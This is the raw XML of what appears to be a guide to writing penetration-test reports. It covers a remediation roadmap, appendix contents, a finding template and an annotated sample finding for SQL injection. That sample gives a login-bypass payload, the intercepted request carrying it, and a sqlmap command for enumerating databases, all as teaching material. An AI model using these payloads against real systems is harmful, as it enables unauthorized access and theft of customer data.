    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>6. Remediation Roadmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>A prioritized action plan for fixing ident</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>ified vulnerabilities. Should be organized by severity and include realistic timeframes.</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760"/>
        <w:gridCol w:w="3200"/>
      </w:tblGrid>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Priority</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Finding</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Recommended Timeframe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Critical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SQL Injection in login portal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Immediate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve"> within 24–48 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Critical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Default credentials on admin panel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sidP="004610F1">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>Immediate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve"> within 24–48 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Outdated Apache version with known CVEs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Within 1–2 weeks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Missing MFA on all admin accounts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Within 1–2 weeks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Overly permissive CORS policy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Within 30 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB458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Missing security headers (X-Frame-Options)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Within 60–90 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>7. Appendices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Supporting technical evidence and raw data that would clutter the main report body. Appendices typically include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Full tool output and scan results (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>, Nessus, Burp Suite exports)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Additional screenshots and evidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Detailed technical background on discovered vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Testing methodology details and checklists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Glossary of technical terms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Writing Individual Vulnerability Findings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Each individual finding follows a consistent structure that communicates the vulne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>rability clearly and drives remediation. A well-written finding answers: What is it? Where is it? How bad is it? What can an attacker do with it? How do we fix it?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Vulnerability Finding Template</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lastRenderedPageBreak/>
              <w:t>Field</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Content &amp; Guidance</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Finding Title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Concise, descriptive name. Format: [Vulnerability Type] in [Component/Location]. Example: 'SQL Injection in User Login Endpoint' — NOT 'SQL Injection Found'</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Severity Rating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Critical / High / Medium / Low / Informational — based on CVSS score and business context. Must be consistent with scoring methodology.</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CVSS Score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Numerical score (0.0–10.0) calculated using the CVSS v3.1 framework. Include the CVSS vector string for reproducibility. Example: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)</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CVE Reference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If the vulnerability matches a known CVE, reference it. Example: CVE-2021-44228 (Log4Shell). Not all findings will have CVEs.</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Affected Asset(s)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Exact URL, IP address, hostname, system, or component. Example: https://app.company.com/api/v1/login — POST endpoint</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Description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 xml:space="preserve">Clear explanation of the vulnerability — what it is, why it exists, and what it means technically. Written for a technical audience (developer or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>sysadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve"> level).</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Business Impact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 xml:space="preserve">What could an attacker do by exploiting this? Frame in business terms: data </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>loss, financial loss, regulatory penalty, reputational damage, service disruption. Written for a non-technical audience.</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Steps to Reproduce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Numbered, step-by-step instructions that allow another person to reproduce the finding exactly. Include all parameters, payloads, and expected vs actual results.</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Evidence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Screenshots, HTTP request/response captures, tool output, or other artifacts proving the vulnerability exists. Must be clear, annotated, and directly linked to the finding.</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Risk Rating Justification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Brief explanation of why this severity was assigned — wh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>at factors elevated or reduced the risk.</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Remediation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Specific, actionable fix guidance. Not just 'fix the SQL injection' — explain HOW: use parameterized queries, input validation libraries, prepared statements. Include code examples where appropriate.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB458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References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Links to relevant documentation: OWASP, CVE details, vendor advisories, CWE entries.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004610F1" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sample Vulnerability Finding: Annotated Example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB45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140" w:type="dxa"/>
              <w:left w:w="240" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E75B6"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>FINDING #1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>SQL Injection in User Authentication Endpoint</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="CC0000"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve">   |   CVSS Score: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="CC0000"/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve">   |   Affec</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve">ted Asset: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://app.target.com/api/v1/login</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>The application's login endpoint at /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>/v1/login is vulnerable to SQL Injection via the username parameter. User-supplied input is directly concatenated into a SQL query without sanitization or parameterization, allowing an attacker to manipulate the quer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>y's logic. This vulnerability exists due to the absence of prepared statements in the authentication function of the backend codebase.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Successful exploitation of this vulnerability allows an unauthenticated attacker to bypass the login mec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>hanism entirely and gain full administrative access to the application. From this position, the attacker can access, modify, or delete all customer records stored in the database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> estimated at 45,000 customer accounts including personally identifiable inf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>ormation (PII) and payment data. This exposure constitutes a reportable breach under GDPR and PCI-DSS, potentially resulting in regulatory fines, legal liability, and severe reputational damage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">The following steps were used to confirm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>this vulnerability during testing:</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60" w:type="dxa"/>
              <w:left w:w="280" w:type="dxa"/>
              <w:bottom w:w="160" w:type="dxa"/>
              <w:right w:w="280" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1. Navigate to the login page at https://app.target.com/login</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2. Enter the following payload in the username field:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   Username: admin' OR '1'='1' --</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   Password: anything</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3. Intercept the POST request in Burp Suite:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   POST /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/v1/login HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   Host: app.target.com</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   Content-Type: application/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>json</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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username":"admin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>' OR '1'='1' --","</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>password":"anything</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>"}</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4. Observe that the response returns HTTP 200 with a valid session token</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   and full administrative acce</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ss — authentication is completely bypassed.</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xml:space="preserve">5. To confirm database extraction capability, the following </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> command</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   was run in the authorized test environment:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -u https://app.target.com/api/v1/login --data='{"username":"*"}' --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>dbs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   Resul</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>t: 3 databases enumerated including '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>customerdata</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>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40" w:type="dxa"/>
              <w:left w:w="240" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>[Screenshot 1] Burp Suite request showing SQL payload in username field</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>[Screenshot 2] HTTP 200 response with session token</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve"> demonstrating successful authentication bypass</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve">[Screenshot 3] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
